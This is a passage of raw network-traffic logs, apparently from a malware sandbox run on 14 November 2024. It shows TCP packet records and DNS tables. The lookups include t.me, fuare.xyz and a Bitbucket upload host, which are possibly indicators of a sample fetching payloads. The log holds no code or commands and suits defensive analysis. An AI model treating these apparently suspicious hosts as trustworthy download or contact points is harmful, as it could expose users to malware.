                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.449385881 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.449420929 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.459058046 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.463737011 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.467755079 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.467761993 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.507159948 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.507802963 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.507810116 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.545891047 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.547899961 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.547926903 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.551562071 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.551774979 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.551835060 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.564924002 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.564995050 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.565011024 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.574765921 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.574843884 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.574887037 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.604043961 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.604142904 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.604223967 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.622823000 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.622879028 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.622880936 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.622941971 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.623006105 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.661200047 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.666115999 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.666160107 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.666203022 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.666204929 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.666275024 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.666312933 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.680357933 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.680423021 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.680445910 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.690126896 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.690208912 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.690221071 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.692342997 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.692365885 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.694807053 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.694863081 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.694875002 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.738502026 CET4435004018.245.60.72192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.738626957 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.738676071 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.738745928 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.739201069 CET50040443192.168.2.518.245.60.72
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.739222050 CET4435004018.245.60.72192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.740358114 CET4435004018.245.60.72192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.740411043 CET50040443192.168.2.518.245.60.72
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.745991945 CET50040443192.168.2.518.245.60.72
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.746180058 CET4435004018.245.60.72192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.142479897 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.142513990 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.142569065 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.143114090 CET50025443192.168.2.5142.250.186.97
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.143146038 CET44350025142.250.186.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.158437014 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.158484936 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.158555031 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.158727884 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.158755064 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511343002 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511373043 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511507988 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511540890 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511591911 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511667013 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511673927 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511676073 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511840105 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.511862993 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.517854929 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.517940998 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.518027067 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.518836975 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.518873930 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.528738022 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.528825045 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.528912067 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.529200077 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.529236078 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550095081 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550148964 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550748110 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550751925 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552681923 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552685976 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552716017 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552721024 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.595805883 CET4435004613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.595957041 CET4435004613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.596009016 CET50046443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.596009016 CET50046443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.690372944 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.691921949 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.691984892 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.694371939 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.694463968 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695555925 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695683956 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695796013 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695812941 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.793524027 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.895728111 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.895941019 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.895957947 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897470951 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897552967 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897810936 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897897005 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897965908 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.939367056 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.958898067 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.958962917 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.958986044 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959029913 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959060907 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959084034 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959170103 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407085896 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407094002 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407143116 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407146931 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407167912 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407187939 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407195091 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407212019 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407212973 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407253027 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407336950 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407349110 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407546043 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407577991 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407605886 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407763004 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407857895 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407979965 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407994032 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408052921 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408068895 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408252954 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408605099 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408622980 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412338972 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412360907 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412399054 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412401915 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412429094 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412430048 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412453890 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412457943 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412691116 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412942886 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413002968 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413033962 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413044930 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413816929 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413924932 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.414799929 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.414803982 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.415076017 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.415086031 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416505098 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416508913 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416554928 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416567087 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416723013 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416749001 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416893005 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.417150974 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449512959 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449579954 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449723005 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449723005 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449789047 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.450103045 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.498749971 CET4435004913.107.246.45192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 14, 2024 15:25:41.255491972 CET | 192.168.2.5 | 1.1.1.1 | 0xe9c8 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:25:42.562597036 CET | 192.168.2.5 | 1.1.1.1 | 0x6a82 | Standard query (0) | fuare.xyz | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:01.357280970 CET | 192.168.2.5 | 1.1.1.1 | 0xe6e3 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:01.357449055 CET | 192.168.2.5 | 1.1.1.1 | 0x5bf3 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:07.081986904 CET | 192.168.2.5 | 1.1.1.1 | 0x8056 | Standard query (0) | apis.google.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:07.082190037 CET | 192.168.2.5 | 1.1.1.1 | 0xc399 | Standard query (0) | apis.google.com | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:13.909111023 CET | 192.168.2.5 | 1.1.1.1 | 0x55ec | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:13.909415960 CET | 192.168.2.5 | 1.1.1.1 | 0x63a1 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:15.322175026 CET | 192.168.2.5 | 1.1.1.1 | 0xeff6 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:15.323007107 CET | 192.168.2.5 | 1.1.1.1 | 0x41d4 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:16.062202930 CET | 192.168.2.5 | 1.1.1.1 | 0x76fc | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:16.062411070 CET | 192.168.2.5 | 1.1.1.1 | 0xa4f0 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:16.809578896 CET | 192.168.2.5 | 1.1.1.1 | 0x3bdd | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:16.809719086 CET | 192.168.2.5 | 1.1.1.1 | 0xb3ff | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:16.813431978 CET | 192.168.2.5 | 1.1.1.1 | 0x13d0 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:16.814315081 CET | 192.168.2.5 | 1.1.1.1 | 0xd2a0 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Nov 14, 2024 15:26:16.834531069 CET | 192.168.2.5 | 1.1.1.1 | 0x66d7 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:26:16.834705114 CET | 192.168.2.5 | 1.1.1.1 | 0x2675 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.851178885 CET192.168.2.51.1.1.10xf9b5Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.851269960 CET192.168.2.51.1.1.10xc8b1Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502371073 CET192.168.2.51.1.1.10xaa0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502496958 CET192.168.2.51.1.1.10x1f63Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502748966 CET192.168.2.51.1.1.10x27fbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502855062 CET192.168.2.51.1.1.10x807cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.509309053 CET192.168.2.51.1.1.10xbe10Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.509464979 CET192.168.2.51.1.1.10xc02bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.374809980 CET192.168.2.51.1.1.10xd5c8Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.221350908 CET192.168.2.51.1.1.10x4e95Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:27:22.998538017 CET192.168.2.51.1.1.10xe36aStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:15.190577030 CET192.168.2.51.1.1.10x7a9cStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:43.001388073 CET192.168.2.51.1.1.10xfe29Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:29:23.112529993 CET192.168.2.51.1.1.10xd4feStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:30:23.174206018 CET192.168.2.51.1.1.10x6b2fStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:31:15.221040964 CET192.168.2.51.1.1.10x4edStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:32:19.150811911 CET192.168.2.51.1.1.10x35b4Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:33:31.204370022 CET192.168.2.51.1.1.10x7cfaStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:23.244005919 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:25.515502930 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:25.515502930 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
